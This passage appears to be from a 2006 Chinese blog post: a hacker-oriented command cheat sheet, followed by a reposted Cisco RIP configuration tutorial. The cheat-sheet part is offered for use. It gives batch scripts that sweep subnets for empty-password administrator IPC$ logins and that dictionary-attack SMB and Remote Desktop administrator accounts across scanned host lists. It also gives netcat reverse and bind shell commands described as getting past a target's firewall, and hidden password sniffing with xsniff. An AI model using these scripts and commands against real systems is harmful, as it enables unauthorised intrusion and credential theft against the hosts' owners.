将本地主机中一批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ascii 设定以ASCII方式传送文件(缺省值) bin 或 image 设定以二进制方式传送文件 bell 每完成一次文件传送,报警提示 cdup 返回上一级目录 close 中断与远程服务器的ftp会话(与open对应) open host[port] 建立指定ftp服务器连接,可指定连接端口 delete 删除远端主机中的文件 mdelete [remote-files] 删除一批文件 mkdir directory-name 在远端主机中建立目录 rename [from] [to] 改变远端主机中的文件名 rmdir directory-name 删除远端主机中的目录 status 显示当前FTP的状态 system 显示远端主机系统类型 user user-name [password] [account] 重新以别的用户名登录远端主机 open host [port] 重新建立一个新的连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 chmod 改变远端主机的文件权限 case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录的父目录 ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip #5 五: MYSQL 命令: mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。(例:mysql -h110.110.110.110 -Uroot -P123456 注:u与root可以不用加空格,其它也一样) exit 退出MYSQL mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 use mysql; show tables; 显示库中的数据表 describe 表名; 显示数据表的结构 create database 库名; 建库 use 库名; create table 表名 (字段设定列表); 建表 drop database 库名; drop table 表名; 删库和删表 delete from 表名; 将表中记录清空 select * from 表名; 显示表中的记录 mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库 school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 win2003系统下新增命令(实用部份): shutdown /参数 关闭或重启本地或远程主机。参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。例:shutdown /r /t 0 立即重启本地主机(无延时) taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。 #6 六: Linux系统下基本命令: 要区分大小写 uname 显示版本信息(同win2K的 ver) dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) pwd 查询当前所在的目录位置 cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 cat 文件名 查看文件内容 cat >abc.txt 往abc.txt文件中写上内容。 more 文件名 以一页一页的方式显示一个文本文件。 cp 复制文件 mv 移动文件 rm 文件名 删除文件,rm -a 目录名删除目录及子目录 mkdir 目录名 建立目录 rmdir 删除子目录,目录内没有文档。 chmod 设定档案或目录的存取权限 grep 在档案中查找字符串 diff 档案文件比较 find 档案搜寻 date 现在的日期、时间 who 查询目前和你使用同一台机器的人以及Login时间地点 w 查询目前上机者的详细资料 whoami 查看自己的帐号名称 groups 查看某人的Group passwd 更改密码 history 查看自己下过的命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用它来编译C语言写的文件 su 权限转换为指定使用者 telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ftp ftp连接上某服务器(同win2K) 附:批处理命令与变量 1:for命令及变量 基本格式: FOR / 参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3 (set): 指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一个"1" 指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;"(1 -1 254)"说明:即从254到1 } command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开 command_parameters:为特定命令指定参数或命令行开关 IN (set):指在(set)中取值;DO command :指执行command 参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。 用法举例: @echo off echo 用法格式:test.bat *.*.* > test.txt for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user: administrator | find "命令成功完成" >>test.txt 存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。 /L 指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的 IP地址;(1 1 254) 指起始值,增长量,结止值。 @echo off echo 用法格式:ok.bat ip FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。 #7 七: 2:if命令及变量 基本格式: IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为"真"。例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。 0 指发现并成功执行(真);1 指没有发现、没执行(假)。 IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。例:"if "%2%"=="4" goto start"指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ") IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。例:"if not nc.exe goto end"指:如果没有发现nc.exe文件就跳到":end"标签处。 IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del 命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如: "if exist test.txt. else echo test.txt.missing ",注意命令中的"." (二)系统外部命令(均需下载相关工具): 1、瑞士军刀:nc.exe 参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行[危险] -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 本机上用:nc -l -p 本机端口 在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 备 注: | 管道命令 < 或 > 重定向命令。"<",例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令 @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。如: @dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。 #8 八: 2、扫锚工具:xscan.exe 基本格式 xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息 xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1- 192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 #9 九: 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接(多线程) -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用-f后面的密码 -F 间隔时间(频率) -l 使用-l后面的用户名 -w 使用-w后面的密码字典 -p 使用-p后面的密码 -D 登录主页面 用法示例 tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码 tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 5、其它: Shutdown.exe Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。) fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙) fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息 Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。 OpenTelnet.exe (远程开启telnet工具) opentelnet.exe \\IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet \\ip 连接上对方。 NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。 ResumeTelnet.exe (OpenTelnet附带的另一个工具) resumetelnet.exe \\IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。 #10 十: 6、FTP命令详解: FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。 FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,其中 -v 显示远程服务器的所有响应信息; -n 限制ftp的自动登录,即不使用;.n etrc文件; -d 使用调试方式; -g 取消全局文件名。 FTP使用的内部命令如下(中括号表示可选项): 1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.$ macro-ame[args]: 执行宏定义macro-name。 3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。 4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。 5.ascii:使用ascii类型传输方式。 6.bell:每个命令执行完毕后计算机响铃一次。 7.bin:使用二进制文件传输方式。 8.bye:退出ftp会话过程。 9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 10.cd remote-dir:进入远程主机目录。 11.cdup:进入远程主机目录的父目录。 12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。 13.close:中断与远程服务器的ftp会话(与open对应)。 14.cr:使用asscii方式传输文件时,将回车换行转换为回行。 15.delete remote-file:删除远程主机文件。 16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。 17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。 18.disconnection:同close。 19.form format:将文件传输方式设置为format,缺省为file方式。 20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。 21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。 22.hash:每传输1024字节,显示一个hash符号(#)。 23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。 24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。 35.modtime file-name:显示远程主机文件的最后修改时间。 36.mput local-file:将多个文件传输至远程主机。 37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。 38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。 39.nmap [inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3 [$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。 40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。 41.open host[port]:建立指定ftp服务器连接,可指定连接端口。 42.passive:进入被动传输方式。 43.prompt:设置多个文件传输时的交互提示。 44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。 45.put local-file[remote-file]:将本地文件local-file传送至远程主机。 46.pwd:显示远程主机的当前工作目录。 47.quit:同bye,退出ftp会话。 48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst. 49.recv remote-file[local-file]:同get。 50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。 51.rhelp[cmd-name]:请求获得远程主机的帮助。 52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。 53.rename[from][to]:更改远程主机文件名。 54.reset:清除回答队列。 55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。 56.rmdir dir-name:删除远程主机目录。 57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。 58.send local-file[remote-file]:同put。 59.sendport:设置PORT命令的使用。 60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。 61.size file-name:显示远程主机文件大小,如:site idle 7200。 62.status:显示当前ftp状态。 63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。 64.sunique:将远程主机文件名存储设置为只一(与runique对应)。 65.system:显示远程主机的操作系统类型。 66.tenex:将文件传输类型设置为TENEX机的所需的类型。 67.tick:设置传输时的字节计数器。 68.trace:设置包跟踪。 69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。 70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3 71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。 72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on. 73.?[cmd]:同help. #11 十一: 7:计算机运行命令全集 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构 wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板winmsd-----系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 mplayer2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕"讲述人" ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32-------音量控制程序 sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 tsshutdn-------60秒倒计时关机命令 tourstart------xp简介(安装完成后出现的漫游xp程序) taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------**整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具,系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略 crazy08 发表于 >2006-11-3 8:46:00 保存该日志到本地 [全文] [评论] [引用] [推荐] [档案] [推给好友] [收藏到网摘] 2006-11-3 教你配CISCO RIP [转] 由器的工作不外乎两个,一是路径选择,二是数据转发。进行数据转发相对容易一些,难的是如何判断到达目的网络的最佳路径。所以,路径选择就成了路由器最重要的工作。 许多路由协议可以完成路径选择的工作,常见的有RIP,OSPF,IGR P和EIGRP协议等等。这些算法中,我们不能简单的说谁好谁坏,因为算法的优劣要依据使用的环境来判断。比如RIP协议,它有时不能准确地选择最优路径,收敛的时间也略显长了一些,但对于小规模的,没有专业人员维护的网络来说,它是首选的路由协议,我们看中的是它的简单性。 如果你手头正有一个小的网络项目,那么,就让我们来安排一个计划,30分钟读完本文(一读),20 分钟再细看一遍本文提及的命令和操作方法(二读),用30分钟配置网络上的所有路由器(小网络,没有几台路由器可以配的),最后20分钟,检查一下网络工作是否正常。好了,一百分钟,你的RIP网络运转起来了。就这么简单,不信,请继续往下看。 一、RIP是什么 RIP (Routing Information Protocols,路由信息协议)是使用最广泛的距离向量协议,它是由施乐(Xerox)在70年代开发的。当时,RIP是XNS(Xerox Network Service,施乐网络服务)协议簇的一部分。TCP/IP版本的RIP是施乐协议的改进版。 RIP最大的特点是,无论实现原理还是配置方法,都非常简单。 度量方法 RIP的度量是基于跳数(hops count)的,每经过一台路由器,路径的跳数加一。如此一来,跳数越多,路径就越长,RIP算法会优先选择跳数少的路径。RIP支持的最大跳数是15,跳数为16的网络被认为不可达。 路由更新 RIP 中路由的更新是通过定时广播实现的。缺省情况下,路由器每隔30秒向与它相连的网络广播自己的路由表,接到广播的路由器将收到的信息添加至自身的路由表中。每个路由器都如此广播,最终网络上所有的路由器都会得知全部的路由信息。正常情况下,每30秒路由器就可以收到一次路由信息确认,如果经过180秒,即6个更新周期,一个路由项都没有得到确认,路由器就认为它已失效了。如果经过240秒,即8个更新周期,路由项仍没有得到确认,它就被从路由表中删除。上面的30秒,180秒和240秒的延时都是由计时器控制的,它们分别是更新计时器(Update Timer)、无效计时器(Invalid Timer)和刷新计时器(Flush Timer)。 路由循环 距离向量类的算法容易产生路由循环,RIP是距离向量算法的一种,所以它也不例外。如果网络上有路由循环,信息就会循环传递,永远不能到达目的地。为了避免这个问题,RIP等距离向量算法实现了下面4个机制。 ? 水平分割(split horizon)。水平分割保证路由器记住每一条路由信息的来源,并且不在收到这条信息的端口上再次发送它。这是保证不产生路由循环的最基本措施。 ? 毒性逆转(poison reverse)。当一条路径信息变为无效之后,路由器并不立即将它从路由表中删除,而是用16,即不可达的度量值将它广播出去。这样虽然增加了路由表的大小,但对消除路由循环很有帮助,它可以立即清除相邻路由器之间的任何环路。 ? 触发更新(trigger update)。当路由表发生变化时,更新报文立即广播给相邻的所有路由器,而不是等待30秒的更新周期。同样,当一个路由器刚启动RIP时,它广播请求报文。收到此广播的相邻路由器立即应答一个更新报文,而不必等到下一个更新周期。这样,网络拓扑的变化会最快地在网络上传播开,减少了路由循环产生的可能性。 ? 抑制计时(holddown timer)。一条路由信息无效之后,一段时间内这条路由都处于抑制状态,即在一定时间内不再接收关于同一目的地址的路由更新。如果,路由器从一个网段上得知一条路径失效,然后,立即在另一个网段上得知这个路由有效。这个有效的信息往往是不正确的,抑制计时避免了这个问题,而且,当一条链路频繁起停时,抑制计时减少了路由的浮动,增加了网络的稳定性。 即便采用了上面的4种方法,路由循环的问题也不能完全解决,只是得到了最大程度的减少。一旦路由循环真的出现,路由项的度量值就会出现计数到无穷大(Count to Infinity)的情况。这是因为路由信息被循环传递,每传过一个路由器,度量值就加1,一直加到16,路径就成为不可达的了。 RIP选择16作为不可达的度量值是很巧妙的,它既足够的大,保证了多数网络能够正常运行,又足够小,使得计数到无穷大所花费的时间最短。 邻居 有些网络是NBMA(Non-Broadcast MultiAccess,非广播多路访问)的,即网络上不允许广播传送数据。对于这种网络,RIP就不能依赖广播传递路由表了。解决方法有很多,最简单的是指定邻居(neighbor),即指定将路由表发送给某一台特定的路由器。 RIP的缺陷 RIP虽然简单易行,并且久经考验,但是也存在着一些很重要的缺陷,主要有以下几点: ? 过于简单,以跳数为依据计算度量值,经常得出非最优路由; ? 度量值以16为限,不适合大的网络; ? 安全性差,接受来自任何设备的路由更新; ? 不支持无类IP地址和VLSM(Variable Length Subnet Mask,变长子网掩码); ? 收敛缓慢,时间经常大于5分钟; ? 消耗带宽很大。 二、路由器怎么配 路由器本身就是一台有多个网络接口的计算机,同普通计算机一样,它也有中央处理器(CPU)、系统主存(RAM)和只读存储器(ROM)等部件。 除此之外,一个很重要的部分是它的网络接口(Interface),为了连结不同类型的网络,路由器的网络接口种类繁多,比如应用在局域网中的以太、快速以太、令牌环接口,应用于广域网的V.35、RS232、ISDN BRI PRI接口等等。 路由器的外存储器主要有两种:NVRAM(Non-Volatile RAM,非易失性RAM)和Flash(闪存)。NVRAM存储路由器的配置文件,Flash用于存放操作系统IOS(Internet Operating System)。 配置模式 CISCO路由器最基本的配置模式有两种:用户(user)和特权(privileged)。在用户模式下,只能显示路由器的状态,特权模式还可以更改路由器的配置。 特权模式下可以进入安装(setup)模式、全局配置(global config)模式,局部配置(sub config)模式。 ? 安装模式提供菜单提示,引导用户进行路由器的基本配置。新路由器第一次启动后,自动进入安装模式。 ? 全局配置模式中可以改变路由器的全局参数,如主机名、密码等等。 ? 局部配置改变路由器的局部参数,例如某一个网络接口的配置、某一种路由协议的配置等等。 配置方法 路由器的配置可以使用多种方法,下面这五种是最常见的: ? 使用超级终端类的工具通过串行口登录控制台(console port)。 ? 将调制解调器连结至路由器的辅助口(auxiliary port),远程拨号登录控制台。 ? 远程登录(telnet)至路由器的某一IP 地址,通过VTY(virtue terminal line,虚拟终端)方式访问路由器。 ? 编辑配置文件,并通过TFTP上传至路由器。 ? 通过网络管理软件(network management system)远程设置路由器参数。 安装路由器 假设我们的项目网络中只有三台路由器。网络拓扑如下图: 它们放在北京、上海和天津,名字分别叫testBJ、testSH和testTJ。我们采用B类保留IP地址172.16.0.0,共划分了四个子网 172.16.1.0、172.16.2.0、172.16.3.0和172.16.4.0,子网掩码均为255.255.255.0。 基本配置 将包装中附带的串行电缆一端连接到Beijing路由器的console口上,另外一端连接到计算机的com口上。启动超级终端程序(Win95/NT中),作适当配置,连接路由器。给路由器加电,连续键入数个回车,出现如下提示符,显示路由器处于用户模式。 testBJ> 由用户模式转入特权模式,使用enable命令。 testBJ> enable testBJ# 和UNIX主机一样,“#”代表特权(root)用户的系统提示符,它表示你进入了特权模式。与enable作用相反,即从特权模式返回用户模式的命令是disable。 特权模式下,可以使用config terminal命令进入全局配置模式。全局配置模式下,可以使用一些配置子项的名称进入局部配置模式。返回的方法都是exit命令。其中,从局部配置模式直接返回特权模式的命令是end。如下所示。 testBJ#c onfig terminal Enter configuration commands, one per line. End with CNTL/Z. testBJ(config)#router rip testBJ(config-router)#exit testBJ(config)#exit testBJ# CISCO IOS的一个非常引人的特色是它的命令行帮助,一个?解决了所有的问题。?可以显示当前模式下的命令列表,可以显示命令全称,还可以显示命令的参数和帮助信息。在任何对命令不确定的地方键入?,系统会给出提示信息。 CISCO路由器还支持命令简写功能,只要不引起歧义,可以用命令的前几个字符替代整个命令,这样,配置时的打字工作量就小多了。 路由器的全部配置信息都保存在配置文件中,当前正在使用的配置文件是running-config,它存放在系统内存里,我们在特权模式下对配置的修改会立即反映到running-config中。startup-config是存储在NVRAM中的配置文件,只有它是掉电不丢失的,所以如果想使所做的修改到下一次启动时仍然有效,就必须保存当前配置。存盘命令如下: testBJ#copy running-config startup-config Building configuration... [OK] testBJ# 更改路由器名、密码 路由器的名字可以用hostname命令修改。 Router(config)#hostname testBJ 